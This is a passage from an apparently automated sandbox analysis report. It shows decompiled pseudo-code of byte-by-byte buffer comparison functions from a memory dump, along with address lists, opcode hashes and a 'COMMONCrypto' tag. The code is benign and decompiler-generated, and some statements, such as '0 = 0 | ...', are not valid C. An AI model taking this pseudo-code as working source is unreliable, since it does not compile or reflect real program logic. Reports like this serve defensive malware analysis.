						_t241 = (0 | _t324 > 0x00000000) * 2 - 1;
						if(_t241 != 0) {
							goto L2;
						}
						goto L21;
					}
					_t241 = (0 | _t322 > 0x00000000) * 2 - 1;
					if(_t241 != 0) {
						goto L2;
					}
					goto L19;
				} else {
					__edi = __al & 0x000000ff;
					__edi = (__al & 0x000000ff) - ( *(__edx - 0x1e) & 0x000000ff);
					if(__edi == 0) {
						L8:
						__edi =  *(__esi - 0x1d) & 0x000000ff;
						__edi = ( *(__esi - 0x1d) & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
						if(__edi == 0) {
							L10:
							__edi =  *(__esi - 0x1c) & 0x000000ff;
							__edi = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
							if(__edi == 0) {
								L12:
								__ecx =  *(__esi - 0x1b) & 0x000000ff;
								__ecx = ( *(__esi - 0x1b) & 0x000000ff) - ( *(__edx - 0x1b) & 0x000000ff);
								if(__ecx != 0) {
									__ecx = (0 | __ecx > 0x00000000) * 2 - 1;
								}
								goto L15;
							}
							0 = 0 | __edi > 0x00000000;
							__ecx = (__edi > 0) * 2 != 1;
							if((__edi > 0) * 2 != 1) {
								L2:
								_t192 = _t241;
								return _t192;
							}
							goto L12;
						}
						0 = 0 | __edi > 0x00000000;
						__ecx = (__edi > 0) * 2 != 1;
						if((__edi > 0) * 2 != 1) {
							goto L2;
						}
						goto L10;
					}
					0 = 0 | __edi > 0x00000000;
					__ecx = (__edi > 0) * 2 != 1;
					if((__edi > 0) * 2 != 1) {
						goto L2;
					}
					goto L8;
				}
			}

0x0009b933
0x0009b933
0x0009b939
0x0009b9c0
0x0009b9c2
0x0009b9c4
0x00000000
0x00000000
0x0009b9ca
0x0009b9d0
0x0009ba57
0x0009ba59
0x0009ba5b
0x00000000
0x00000000
0x0009ba61
0x0009ba67
0x0009baee
0x0009baf0
0x0009baf2
0x00000000
0x00000000
0x0009baf8
0x0009bafe
0x0009bb85
0x0009bb87
0x0009bb89
0x00000000
0x00000000
0x0009bb8f
0x0009bb95
0x0009bc1c
0x0009bc1e
0x0009bc20
0x00000000
0x00000000
0x0009bc2c
0x0009bcb4
0x0009bcb6
0x0009bcb8
0x00000000
0x00000000
0x0009bcbe
0x0009bcc4
0x0009bd4b
0x0009bd4d
0x0009bd4f
0x0009bd4f
0x00000000
0x0009bd4f
0x0009bcd1
0x0009bcd3
0x0009bceb
0x0009bcf3
0x0009bcf5
0x0009bd0d
0x0009bd15
0x0009bd17
0x0009bd2f
0x0009bd37
0x0009bd39
0x0009bd42
0x0009bd42
0x00000000
0x0009bd39
0x0009bd20
0x0009bd29
0x00000000
0x00000000
0x00000000
0x0009bd29
0x0009bcfe
0x0009bd07
0x00000000
0x00000000
0x00000000
0x0009bd07
0x0009bcdc
0x0009bce5
0x00000000
0x00000000
0x00000000
0x0009bce5
0x0009bc3a
0x0009bc3c
0x0009bc54
0x0009bc5c
0x0009bc5e
0x0009bc76
0x0009bc7e
0x0009bc80
0x0009bc98
0x0009bca0
0x0009bca2
0x0009bcab
0x0009bcab
0x00000000
0x0009bca2
0x0009bc89
0x0009bc92
0x00000000
0x00000000
0x00000000
0x0009bc92
0x0009bc67
0x0009bc70
0x00000000
0x00000000
0x00000000
0x0009bc70
0x0009bc45
0x0009bc4e
0x00000000
0x00000000
0x00000000
0x0009bc4e
0x0009bba2
0x0009bba4
0x0009bbbc
0x0009bbc4
0x0009bbc6
0x0009bbde
0x0009bbe6
0x0009bbe8
0x0009bc00
0x0009bc08
0x0009bc0a
0x0009bc13
0x0009bc13
0x00000000
0x0009bc0a
0x0009bbf1
0x0009bbfa
0x00000000
0x00000000
0x00000000
0x0009bbfa
0x0009bbcf
0x0009bbd8
0x00000000
0x00000000
0x00000000
0x0009bbd8
0x0009bbad
0x0009bbb6
0x00000000
0x00000000
0x00000000
0x0009bbb6
0x0009bb0b
0x0009bb0d
0x0009bb25
0x0009bb2d
0x0009bb2f
0x0009bb47
0x0009bb4f
0x0009bb51
0x0009bb69
0x0009bb71
0x0009bb73
0x0009bb7c
0x0009bb7c
0x00000000
0x0009bb73
0x0009bb5a
0x0009bb63
0x00000000
0x00000000
0x00000000
0x0009bb63
0x0009bb38
0x0009bb41
0x00000000
0x00000000
0x00000000
0x0009bb41
0x0009bb16
0x0009bb1f
0x00000000
0x00000000
0x00000000
0x0009bb1f
0x0009ba74
0x0009ba76
0x0009ba8e
0x0009ba96
0x0009ba98
0x0009bab0
0x0009bab8
0x0009baba
0x0009bad2
0x0009bada
0x0009badc
0x0009bae5
0x0009bae5
0x00000000
0x0009badc
0x0009bac3
0x0009bacc
0x00000000
0x00000000
0x00000000
0x0009bacc
0x0009baa1
0x0009baaa
0x00000000
0x00000000
0x00000000
0x0009baaa
0x0009ba7f
0x0009ba88
0x00000000
0x00000000
0x00000000
0x0009ba88
0x0009b9dd
0x0009b9df
0x0009b9f7
0x0009b9ff
0x0009ba01
0x0009ba19
0x0009ba21
0x0009ba23
0x0009ba3b
0x0009ba43
0x0009ba45
0x0009ba4e
0x0009ba4e
0x00000000
0x0009ba45
0x0009ba2c
0x0009ba35
0x00000000
0x00000000
0x00000000
0x0009ba35
0x0009ba0a
0x0009ba13
0x00000000
0x00000000
0x00000000
0x0009ba13
0x0009b9e8
0x0009b9f1
0x00000000
0x00000000
0x00000000
0x0009b93f
0x0009b93f
0x0009b946
0x0009b948
0x0009b960
0x0009b960
0x0009b968
0x0009b96a
0x0009b982
0x0009b982
0x0009b98a
0x0009b98c
0x0009b9a4
0x0009b9a4
0x0009b9ac
0x0009b9ae
0x0009b9b7
0x0009b9b7
0x00000000
0x0009b9ae
0x0009b992
0x0009b995
0x0009b99e
0x0009b4f6
0x0009b4f6
0x0009c2e7
0x0009c2e7
0x00000000
0x0009b99e
0x0009b970
0x0009b973
0x0009b97c
0x00000000
0x00000000
0x00000000
0x0009b97c
0x0009b94e
0x0009b951
0x0009b95a
0x00000000
0x00000000
0x00000000
0x0009b95a

Memory Dump Source

Source File: 00000000.00000002.646740081.0000000000091000.00000020.00020000.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.646727734.0000000000090000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.646793640.00000000000A8000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.646815454.00000000000AE000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.646836339.00000000000AF000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.646857656.00000000000B1000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647051678.00000000000F2000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction ID: c6339f40e066c5c3f1d5830d9b412b05a62eef217d14b8f17a4cbd8e6802bb9e
Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction Fuzzy Hash: ADC14F722051930ADFAD463EA67453EBAE15BA27B131A075DD8B2CF1D6FF20C524F620

Uniqueness

Uniqueness Score: -1.00%

Function 0009BD68, Relevance: .3, Instructions: 341
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E0009BD68(void* __edx, void* __esi) {
				signed int _t197;
				signed char _t198;
				signed char _t199;
				signed char _t200;
				signed char _t202;
				signed char _t203;
				signed int _t246;
				void* _t294;
				void* _t297;
				void* _t299;
				void* _t301;
				void* _t303;
				void* _t305;
				void* _t307;
				void* _t309;
				void* _t311;
				void* _t313;
				void* _t315;
				void* _t317;
				void* _t319;
				void* _t321;
				void* _t323;
				void* _t325;
				void* _t327;
				void* _t329;
				void* _t331;
				void* _t333;
				void* _t335;
				void* _t336;

				_t336 = __esi;
				_t294 = __edx;
				if( *((intOrPtr*)(__esi - 0x1f)) ==  *((intOrPtr*)(__edx - 0x1f))) {
					_t246 = 0;
					L14:
					if(_t246 != 0) {
						goto L1;
					}
					_t198 =  *(_t336 - 0x1b);
					if(_t198 ==  *(_t294 - 0x1b)) {
						_t246 = 0;
						L25:
						if(_t246 != 0) {
							goto L1;
						}
						_t199 =  *(_t336 - 0x17);
						if(_t199 ==  *(_t294 - 0x17)) {
							_t246 = 0;
							L36:
							if(_t246 != 0) {
								goto L1;
							}
							_t200 =  *(_t336 - 0x13);
							if(_t200 ==  *(_t294 - 0x13)) {
								_t246 = 0;
								L47:
								if(_t246 != 0) {
									goto L1;
								}
								if( *(_t336 - 0xf) ==  *(_t294 - 0xf)) {
									_t246 = 0;
									L58:
									if(_t246 != 0) {
										goto L1;
									}
									_t202 =  *(_t336 - 0xb);
									if(_t202 ==  *(_t294 - 0xb)) {
										_t246 = 0;
										L69:
										if(_t246 != 0) {
											goto L1;
										}
										_t203 =  *(_t336 - 7);
										if(_t203 ==  *(_t294 - 7)) {
											_t246 = 0;
											L80:
											if(_t246 != 0) {
												goto L1;
											}
											_t297 = ( *(_t336 - 3) & 0x000000ff) - ( *(_t294 - 3) & 0x000000ff);
											if(_t297 == 0) {
												L83:
												_t299 = ( *(_t336 - 2) & 0x000000ff) - ( *(_t294 - 2) & 0x000000ff);
												if(_t299 == 0) {
													L3:
													_t246 = ( *(_t336 - 1) & 0x000000ff) - ( *(_t294 - 1) & 0x000000ff);
													if(_t246 != 0) {
														_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
													}
													goto L1;
												}
												_t246 = (0 | _t299 > 0x00000000) * 2 - 1;
												if(_t246 != 0) {
													goto L1;
												} else {
													goto L3;
												}
											}
											_t246 = (0 | _t297 > 0x00000000) * 2 - 1;
											if(_t246 != 0) {
												goto L1;
											}
											goto L83;
										}
										_t301 = (_t203 & 0x000000ff) - ( *(_t294 - 7) & 0x000000ff);
										if(_t301 == 0) {
											L73:
											_t303 = ( *(_t336 - 6) & 0x000000ff) - ( *(_t294 - 6) & 0x000000ff);
											if(_t303 == 0) {
												L75:
												_t305 = ( *(_t336 - 5) & 0x000000ff) - ( *(_t294 - 5) & 0x000000ff);
												if(_t305 == 0) {
													L77:
													_t246 = ( *(_t336 - 4) & 0x000000ff) - ( *(_t294 - 4) & 0x000000ff);
													if(_t246 != 0) {
														_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
													}
													goto L80;
												}
												_t246 = (0 | _t305 > 0x00000000) * 2 - 1;
												if(_t246 != 0) {
													goto L1;
												}
												goto L77;
											}
											_t246 = (0 | _t303 > 0x00000000) * 2 - 1;
											if(_t246 != 0) {
												goto L1;
											}
											goto L75;
										}
										_t246 = (0 | _t301 > 0x00000000) * 2 - 1;
										if(_t246 != 0) {
											goto L1;
										}
										goto L73;
									}
									_t307 = (_t202 & 0x000000ff) - ( *(_t294 - 0xb) & 0x000000ff);
									if(_t307 == 0) {
										L62:
										_t309 = ( *(_t336 - 0xa) & 0x000000ff) - ( *(_t294 - 0xa) & 0x000000ff);
										if(_t309 == 0) {
											L64:
											_t311 = ( *(_t336 - 9) & 0x000000ff) - ( *(_t294 - 9) & 0x000000ff);
											if(_t311 == 0) {
												L66:
												_t246 = ( *(_t336 - 8) & 0x000000ff) - ( *(_t294 - 8) & 0x000000ff);
												if(_t246 != 0) {
													_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
												}
												goto L69;
											}
											_t246 = (0 | _t311 > 0x00000000) * 2 - 1;
											if(_t246 != 0) {
												goto L1;
											}
											goto L66;
										}
										_t246 = (0 | _t309 > 0x00000000) * 2 - 1;
										if(_t246 != 0) {
											goto L1;
										}
										goto L64;
									}
									_t246 = (0 | _t307 > 0x00000000) * 2 - 1;
									if(_t246 != 0) {
										goto L1;
									}
									goto L62;
								}
								_t313 = ( *(_t336 - 0xf) & 0x000000ff) - ( *(_t294 - 0xf) & 0x000000ff);
								if(_t313 == 0) {
									L51:
									_t315 = ( *(_t336 - 0xe) & 0x000000ff) - ( *(_t294 - 0xe) & 0x000000ff);
									if(_t315 == 0) {
										L53:
										_t317 = ( *(_t336 - 0xd) & 0x000000ff) - ( *(_t294 - 0xd) & 0x000000ff);
										if(_t317 == 0) {
											L55:
											_t246 = ( *(_t336 - 0xc) & 0x000000ff) - ( *(_t294 - 0xc) & 0x000000ff);
											if(_t246 != 0) {
												_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
											}
											goto L58;
										}
										_t246 = (0 | _t317 > 0x00000000) * 2 - 1;
										if(_t246 != 0) {
											goto L1;
										}
										goto L55;
									}
									_t246 = (0 | _t315 > 0x00000000) * 2 - 1;
									if(_t246 != 0) {
										goto L1;
									}
									goto L53;
								}
								_t246 = (0 | _t313 > 0x00000000) * 2 - 1;
								if(_t246 != 0) {
									goto L1;
								}
								goto L51;
							}
							_t319 = (_t200 & 0x000000ff) - ( *(_t294 - 0x13) & 0x000000ff);
							if(_t319 == 0) {
								L40:
								_t321 = ( *(_t336 - 0x12) & 0x000000ff) - ( *(_t294 - 0x12) & 0x000000ff);
								if(_t321 == 0) {
									L42:
									_t323 = ( *(_t336 - 0x11) & 0x000000ff) - ( *(_t294 - 0x11) & 0x000000ff);
									if(_t323 == 0) {
										L44:
										_t246 = ( *(_t336 - 0x10) & 0x000000ff) - ( *(_t294 - 0x10) & 0x000000ff);
										if(_t246 != 0) {
											_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
										}
										goto L47;
									}
									_t246 = (0 | _t323 > 0x00000000) * 2 - 1;
									if(_t246 != 0) {
										goto L1;
									}
									goto L44;
								}
								_t246 = (0 | _t321 > 0x00000000) * 2 - 1;
								if(_t246 != 0) {
									goto L1;
								}
								goto L42;
							}
							_t246 = (0 | _t319 > 0x00000000) * 2 - 1;
							if(_t246 != 0) {
								goto L1;
							}
							goto L40;
						}
						_t325 = (_t199 & 0x000000ff) - ( *(_t294 - 0x17) & 0x000000ff);
						if(_t325 == 0) {
							L29:
							_t327 = ( *(_t336 - 0x16) & 0x000000ff) - ( *(_t294 - 0x16) & 0x000000ff);
							if(_t327 == 0) {
								L31:
								_t329 = ( *(_t336 - 0x15) & 0x000000ff) - ( *(_t294 - 0x15) & 0x000000ff);
								if(_t329 == 0) {
									L33:
									_t246 = ( *(_t336 - 0x14) & 0x000000ff) - ( *(_t294 - 0x14) & 0x000000ff);
									if(_t246 != 0) {
										_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
									}
									goto L36;
								}
								_t246 = (0 | _t329 > 0x00000000) * 2 - 1;
								if(_t246 != 0) {
									goto L1;
								}
								goto L33;
							}
							_t246 = (0 | _t327 > 0x00000000) * 2 - 1;
							if(_t246 != 0) {
								goto L1;
							}
							goto L31;
						}
						_t246 = (0 | _t325 > 0x00000000) * 2 - 1;
						if(_t246 != 0) {
							goto L1;
						}
						goto L29;
					}
					_t331 = (_t198 & 0x000000ff) - ( *(_t294 - 0x1b) & 0x000000ff);
					if(_t331 == 0) {
						L18:
						_t333 = ( *(_t336 - 0x1a) & 0x000000ff) - ( *(_t294 - 0x1a) & 0x000000ff);
						if(_t333 == 0) {
							L20:
							_t335 = ( *(_t336 - 0x19) & 0x000000ff) - ( *(_t294 - 0x19) & 0x000000ff);
							if(_t335 == 0) {
								L22:
								_t246 = ( *(_t336 - 0x18) & 0x000000ff) - ( *(_t294 - 0x18) & 0x000000ff);
								if(_t246 != 0) {
									_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
								}
								goto L25;
							}
							_t246 = (0 | _t335 > 0x00000000) * 2 - 1;
							if(_t246 != 0) {
								goto L1;
							}
							goto L22;
						}
						_t246 = (0 | _t333 > 0x00000000) * 2 - 1;
						if(_t246 != 0) {
							goto L1;
						}
						goto L20;
					}
					_t246 = (0 | _t331 > 0x00000000) * 2 - 1;
					if(_t246 != 0) {
						goto L1;
					}
					goto L18;
				} else {
					__edi =  *(__esi - 0x1f) & 0x000000ff;
					__edi = ( *(__esi - 0x1f) & 0x000000ff) - ( *(__edx - 0x1f) & 0x000000ff);
					if(__edi == 0) {
						L7:
						__edi =  *(__esi - 0x1e) & 0x000000ff;
						__edi = ( *(__esi - 0x1e) & 0x000000ff) - ( *(__edx - 0x1e) & 0x000000ff);
						if(__edi == 0) {
							L9:
							__edi =  *(__esi - 0x1d) & 0x000000ff;
							__edi = ( *(__esi - 0x1d) & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
							if(__edi == 0) {
								L11:
								__ecx =  *(__esi - 0x1c) & 0x000000ff;
								__ecx = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
								if(__ecx != 0) {
									__ecx = (0 | __ecx > 0x00000000) * 2 - 1;
								}
								goto L14;
							}
							0 = 0 | __edi > 0x00000000;
							__ecx = (__edi > 0) * 2 != 1;
							if((__edi > 0) * 2 != 1) {
								goto L1;
							}
							goto L11;
						}
						0 = 0 | __edi > 0x00000000;
						__ecx = (__edi > 0) * 2 != 1;
						if((__edi > 0) * 2 != 1) {
							goto L1;
						}
						goto L9;
					}
					0 = 0 | __edi > 0x00000000;
					__ecx = (__edi > 0) * 2 != 1;
					if((__edi > 0) * 2 != 1) {
						goto L1;
					}
					goto L7;
				}
				L1:
				_t197 = _t246;
				return _t197;
			}

0x0009bd68
0x0009bd68
0x0009bd6e
0x0009bdf6
0x0009bdf8
0x0009bdfa
0x00000000
0x00000000
0x0009be00
0x0009be06
0x0009be8d
0x0009be8f
0x0009be91
0x00000000
0x00000000
0x0009be97
0x0009be9d
0x0009bf24
0x0009bf26
0x0009bf28
0x00000000
0x00000000
0x0009bf2e
0x0009bf34
0x0009bfbb
0x0009bfbd
0x0009bfbf
0x00000000
0x00000000
0x0009bfcb
0x0009c053
0x0009c055
0x0009c057
0x00000000
0x00000000
0x0009c05d
0x0009c063
0x0009c0ea
0x0009c0ec
0x0009c0ee
0x00000000
0x00000000
0x0009c0f4
0x0009c0fa
0x0009c181
0x0009c183
0x0009c185
0x00000000
0x00000000
0x0009c193
0x0009c195
0x0009c1ad
0x0009c1b5
0x0009c1b7
0x0009b910
0x0009b918
0x0009b91a
0x0009b927
0x0009b927
0x00000000
0x0009b91a
0x0009c1c4
0x0009b90a
0x00000000
0x00000000
0x00000000
0x00000000
0x0009b90a
0x0009c19e
0x0009c1a7
0x00000000
0x00000000
0x00000000
0x0009c1a7
0x0009c107
0x0009c109
0x0009c121
0x0009c129
0x0009c12b
0x0009c143
0x0009c14b
0x0009c14d
0x0009c165
0x0009c16d
0x0009c16f
0x0009c178
0x0009c178
0x00000000
0x0009c16f
0x0009c156
0x0009c15f
0x00000000
0x00000000
0x00000000
0x0009c15f
0x0009c134
0x0009c13d
0x00000000
0x00000000
0x00000000
0x0009c13d
0x0009c112
0x0009c11b
0x00000000
0x00000000
0x00000000
0x0009c11b
0x0009c070
0x0009c072
0x0009c08a
0x0009c092
0x0009c094
0x0009c0ac
0x0009c0b4
0x0009c0b6
0x0009c0ce
0x0009c0d6
0x0009c0d8
0x0009c0e1
0x0009c0e1
0x00000000
0x0009c0d8
0x0009c0bf
0x0009c0c8
0x00000000
0x00000000
0x00000000
0x0009c0c8
0x0009c09d
0x0009c0a6
0x00000000
0x00000000
0x00000000
0x0009c0a6
0x0009c07b
0x0009c084
0x00000000
0x00000000
0x00000000
0x0009c084
0x0009bfd9
0x0009bfdb
0x0009bff3
0x0009bffb
0x0009bffd
0x0009c015
0x0009c01d
0x0009c01f
0x0009c037
0x0009c03f
0x0009c041
0x0009c04a
0x0009c04a
0x00000000
0x0009c041
0x0009c028
0x0009c031
0x00000000
0x00000000
0x00000000
0x0009c031
0x0009c006
0x0009c00f
0x00000000
0x00000000
0x00000000
0x0009c00f
0x0009bfe4
0x0009bfed
0x00000000
0x00000000
0x00000000
0x0009bfed
0x0009bf41
0x0009bf43
0x0009bf5b
0x0009bf63
0x0009bf65
0x0009bf7d
0x0009bf85
0x0009bf87
0x0009bf9f
0x0009bfa7
0x0009bfa9
0x0009bfb2
0x0009bfb2
0x00000000
0x0009bfa9
0x0009bf90
0x0009bf99
0x00000000
0x00000000
0x00000000
0x0009bf99
0x0009bf6e
0x0009bf77
0x00000000
0x00000000
0x00000000
0x0009bf77
0x0009bf4c
0x0009bf55
0x00000000
0x00000000
0x00000000
0x0009bf55
0x0009beaa
0x0009beac
0x0009bec4
0x0009becc
0x0009bece
0x0009bee6
0x0009beee
0x0009bef0
0x0009bf08
0x0009bf10
0x0009bf12
0x0009bf1b
0x0009bf1b
0x00000000
0x0009bf12
0x0009bef9
0x0009bf02
0x00000000
0x00000000
0x00000000
0x0009bf02
0x0009bed7
0x0009bee0
0x00000000
0x00000000
0x00000000
0x0009bee0
0x0009beb5
0x0009bebe
0x00000000
0x00000000
0x00000000
0x0009bebe
0x0009be13
0x0009be15
0x0009be2d
0x0009be35
0x0009be37
0x0009be4f
0x0009be57
0x0009be59
0x0009be71
0x0009be79
0x0009be7b
0x0009be84
0x0009be84
0x00000000
0x0009be7b
0x0009be62
0x0009be6b
0x00000000
0x00000000
0x00000000
0x0009be6b
0x0009be40
0x0009be49
0x00000000
0x00000000
0x00000000
0x0009be49
0x0009be1e
0x0009be27
0x00000000
0x00000000
0x00000000
0x0009bd74
0x0009bd78
0x0009bd7c
0x0009bd7e
0x0009bd96
0x0009bd96
0x0009bd9e
0x0009bda0
0x0009bdb8
0x0009bdb8
0x0009bdc0
0x0009bdc2
0x0009bdda
0x0009bdda
0x0009bde2
0x0009bde4
0x0009bded
0x0009bded
0x00000000
0x0009bde4
0x0009bdc8
0x0009bdcb
0x0009bdd4
0x00000000
0x00000000
0x00000000
0x0009bdd4
0x0009bda6
0x0009bda9
0x0009bdb2
0x00000000
0x00000000
0x00000000
0x0009bdb2
0x0009bd84
0x0009bd87
0x0009bd90
0x00000000
0x00000000
0x00000000
0x0009bd90
0x0009b4f6
0x0009b4f6
0x0009c2e7

Memory Dump Source

Source File: 00000000.00000002.646740081.0000000000091000.00000020.00020000.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.646727734.0000000000090000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.646793640.00000000000A8000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.646815454.00000000000AE000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.646836339.00000000000AF000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.646857656.00000000000B1000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647051678.00000000000F2000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction ID: 27ee25c210343531e16a815e9bd70ca42a23e857cc1c890be36188dc53843a8f
Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction Fuzzy Hash: B3C141322091934ADFAD463E967443FBAE15B927B131A076DD8B2CF1D6FF208524F620

Uniqueness

Uniqueness Score: -1.00%

Function 0009B4FE, Relevance: .3, Instructions: 331
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E0009B4FE(void* __edx, void* __esi) {
				signed int _t184;
				signed char _t185;
				signed char _t186;
				signed char _t187;
				signed char _t188;
				signed char _t190;
				signed int _t231;
				void* _t275;
				void* _t278;
				void* _t280;
				void* _t282;
				void* _t284;
				void* _t286;
				void* _t288;
				void* _t290;
				void* _t292;
				void* _t294;
				void* _t296;
				void* _t298;
				void* _t300;
				void* _t302;
				void* _t304;
				void* _t306;
				void* _t308;
				void* _t310;
				void* _t312;
				void* _t313;

				_t313 = __esi;
				_t275 = __edx;
				if( *((intOrPtr*)(__esi - 0x1d)) ==  *((intOrPtr*)(__edx - 0x1d))) {
					_t231 = 0;
					L11:
					if(_t231 != 0) {
						goto L1;
					}
					_t185 =  *(_t313 - 0x19);
					if(_t185 ==  *(_t275 - 0x19)) {
						_t231 = 0;
						L22:
						if(_t231 != 0) {
							goto L1;
						}
						_t186 =  *(_t313 - 0x15);
						if(_t186 ==  *(_t275 - 0x15)) {
							_t231 = 0;
							L33:
							if(_t231 != 0) {
								goto L1;
							}
							_t187 =  *(_t313 - 0x11);
							if(_t187 ==  *(_t275 - 0x11)) {
								_t231 = 0;
								L44:
								if(_t231 != 0) {
									goto L1;
								}
								_t188 =  *(_t313 - 0xd);
								if(_t188 ==  *(_t275 - 0xd)) {
									_t231 = 0;
									L55:
									if(_t231 != 0) {
										goto L1;
									}
									if( *(_t313 - 9) ==  *(_t275 - 9)) {
										_t231 = 0;
										L66:
										if(_t231 != 0) {
											goto L1;
										}
										_t190 =  *(_t313 - 5);
										if(_t190 ==  *(_t275 - 5)) {
											_t231 = 0;
											L77:
											if(_t231 == 0) {
												_t231 = ( *(_t313 - 1) & 0x000000ff) - ( *(_t275 - 1) & 0x000000ff);
												if(_t231 != 0) {
													_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
												}
											}
											goto L1;
										}
										_t278 = (_t190 & 0x000000ff) - ( *(_t275 - 5) & 0x000000ff);
										if(_t278 == 0) {
											L70:
											_t280 = ( *(_t313 - 4) & 0x000000ff) - ( *(_t275 - 4) & 0x000000ff);
											if(_t280 == 0) {
												L72:
												_t282 = ( *(_t313 - 3) & 0x000000ff) - ( *(_t275 - 3) & 0x000000ff);
												if(_t282 == 0) {
													L74:
													_t231 = ( *(_t313 - 2) & 0x000000ff) - ( *(_t275 - 2) & 0x000000ff);
													if(_t231 != 0) {
														_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
													}
													goto L77;
												}
												_t231 = (0 | _t282 > 0x00000000) * 2 - 1;
												if(_t231 != 0) {
													goto L1;
												}
												goto L74;
											}
											_t231 = (0 | _t280 > 0x00000000) * 2 - 1;
											if(_t231 != 0) {
												goto L1;
											}
											goto L72;
										}
										_t231 = (0 | _t278 > 0x00000000) * 2 - 1;
										if(_t231 != 0) {
											goto L1;
										}
										goto L70;
									}
									_t284 = ( *(_t313 - 9) & 0x000000ff) - ( *(_t275 - 9) & 0x000000ff);
									if(_t284 == 0) {
										L59:
										_t286 = ( *(_t313 - 8) & 0x000000ff) - ( *(_t275 - 8) & 0x000000ff);
										if(_t286 == 0) {
											L61:
											_t288 = ( *(_t313 - 7) & 0x000000ff) - ( *(_t275 - 7) & 0x000000ff);
											if(_t288 == 0) {
												L63:
												_t231 = ( *(_t313 - 6) & 0x000000ff) - ( *(_t275 - 6) & 0x000000ff);
												if(_t231 != 0) {
													_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
												}
												goto L66;
											}
											_t231 = (0 | _t288 > 0x00000000) * 2 - 1;
											if(_t231 != 0) {
												goto L1;
											}
											goto L63;
										}
										_t231 = (0 | _t286 > 0x00000000) * 2 - 1;
										if(_t231 != 0) {
											goto L1;
										}
										goto L61;
									}
									_t231 = (0 | _t284 > 0x00000000) * 2 - 1;
									if(_t231 != 0) {
										goto L1;
									}
									goto L59;
								}
								_t290 = (_t188 & 0x000000ff) - ( *(_t275 - 0xd) & 0x000000ff);
								if(_t290 == 0) {
									L48:
									_t292 = ( *(_t313 - 0xc) & 0x000000ff) - ( *(_t275 - 0xc) & 0x000000ff);
									if(_t292 == 0) {
										L50:
										_t294 = ( *(_t313 - 0xb) & 0x000000ff) - ( *(_t275 - 0xb) & 0x000000ff);
										if(_t294 == 0) {
											L52:
											_t231 = ( *(_t313 - 0xa) & 0x000000ff) - ( *(_t275 - 0xa) & 0x000000ff);
											if(_t231 != 0) {
												_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
											}
											goto L55;
										}
										_t231 = (0 | _t294 > 0x00000000) * 2 - 1;
										if(_t231 != 0) {
											goto L1;
										}
										goto L52;
									}
									_t231 = (0 | _t292 > 0x00000000) * 2 - 1;
									if(_t231 != 0) {
										goto L1;
									}
									goto L50;
								}
								_t231 = (0 | _t290 > 0x00000000) * 2 - 1;
								if(_t231 != 0) {
									goto L1;
								}
								goto L48;
							}
							_t296 = (_t187 & 0x000000ff) - ( *(_t275 - 0x11) & 0x000000ff);
							if(_t296 == 0) {
								L37:
								_t298 = ( *(_t313 - 0x10) & 0x000000ff) - ( *(_t275 - 0x10) & 0x000000ff);
								if(_t298 == 0) {
									L39:
									_t300 = ( *(_t313 - 0xf) & 0x000000ff) - ( *(_t275 - 0xf) & 0x000000ff);
									if(_t300 == 0) {
										L41:
										_t231 = ( *(_t313 - 0xe) & 0x000000ff) - ( *(_t275 - 0xe) & 0x000000ff);
										if(_t231 != 0) {
											_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
										}
										goto L44;
									}
									_t231 = (0 | _t300 > 0x00000000) * 2 - 1;
									if(_t231 != 0) {
										goto L1;
									}
									goto L41;
								}
								_t231 = (0 | _t298 > 0x00000000) * 2 - 1;
								if(_t231 != 0) {
									goto L1;
								}
								goto L39;
							}
							_t231 = (0 | _t296 > 0x00000000) * 2 - 1;
							if(_t231 != 0) {
								goto L1;
							}
							goto L37;
						}
						_t302 = (_t186 & 0x000000ff) - ( *(_t275 - 0x15) & 0x000000ff);
						if(_t302 == 0) {
							L26:
							_t304 = ( *(_t313 - 0x14) & 0x000000ff) - ( *(_t275 - 0x14) & 0x000000ff);
							if(_t304 == 0) {
								L28:
								_t306 = ( *(_t313 - 0x13) & 0x000000ff) - ( *(_t275 - 0x13) & 0x000000ff);
								if(_t306 == 0) {
									L30:
									_t231 = ( *(_t313 - 0x12) & 0x000000ff) - ( *(_t275 - 0x12) & 0x000000ff);
									if(_t231 != 0) {
										_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
									}
									goto L33;
								}
								_t231 = (0 | _t306 > 0x00000000) * 2 - 1;
								if(_t231 != 0) {
									goto L1;
								}
								goto L30;
							}
							_t231 = (0 | _t304 > 0x00000000) * 2 - 1;
							if(_t231 != 0) {
